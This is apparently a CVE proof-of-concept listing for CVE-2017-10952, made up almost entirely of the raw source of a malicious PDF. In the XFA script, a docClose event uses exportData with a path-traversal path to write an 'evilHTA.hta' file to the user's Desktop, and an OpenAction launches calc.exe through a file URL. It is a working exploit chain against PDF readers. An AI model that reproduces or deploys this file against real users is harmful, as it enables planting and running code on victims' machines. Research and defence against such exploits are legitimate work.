4837 Total CVEs
26 Years
GitHub
README.md
README.md not found for CVE-2017-10952. The file may not exist in the repository.
POC / document2.pdf PDF
%PDF-1.1
%���
1 0 obj
<<
/Type /Catalog
/Pages 2 0 R
/AcroForm <<
/Fields [3 0 R]
/XFA 4 0 R
>>
/OpenAction 5 0 R
/Names 6 0 R
>>
endobj
2 0 obj
<<
/Type /Pages
/Count 1
/Kids [7 0 R]
>>
endobj
3 0 obj
<<
/T (0)
/Kids [8 0 R]
>>
endobj
4 0 obj
<<
/Length 575
>>
stream
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config><present><pdf>
    <interactive>1</interactive>
</pdf></present></config>

<template>
    <subform name="_">
        <pageSet/>
        <field id="Hello World!">
            <event activity="docClose" ref="$host">
                <script contentType='application/x-javascript'>
                    var user = identity.name;
                    xfa.host.exportData("../../../users/"+user+"/Desktop/evilHTA.hta",false);
                </script>
            </event>
        </field>
    </subform>
</template>
</xdp:xdp>

endstream
endobj
5 0 obj
<<
/Type /Action
/S /JavaScript
/JS (xfa.host.gotoURL\("file:///C:/windows/system32/calc.exe"\); ;)
>>
endobj
6 0 obj
<<
/JavaScript 9 0 R
>>
endobj
7 0 obj
<<
/Type /Page
/Contents 10 0 R
/Parent 2 0 R
/Resources <<
/Font <<
/F1 <<
/Type /Font
/Subtype /Type1
/BaseFont /Arial
>>
>>
>>
>>
endobj
8 0 obj
<<
/Subtype /Widget
/Rect []
/T ()
/FT /Btn
>>
endobj
9 0 obj
<<
/Names [(DoPrint) 5 0 R]
>>
endobj
10 0 obj
<<
/Length 47
>>
stream
BT
/F1 100
Tf 1 1 1 1 1 0
Tr(Hello World!)Tj
ET
endstream
endobj
xref
0 11
0000000000 65535 f
0000000015 00000 n
0000000138 00000 n
0000000195 00000 n
0000000237 00000 n
0000000865 00000 n
0000000979 00000 n
0000001018 00000 n
0000001166 00000 n
0000001228 00000 n
0000001274 00000 n
trailer
<<
/Root 1 0 R
/ID [<5F30721725A122C4048DD6489E870BED> <5F30721725A122C4048DD6489E870BED>]
/Size 11
>>
startxref
1374
%%EOF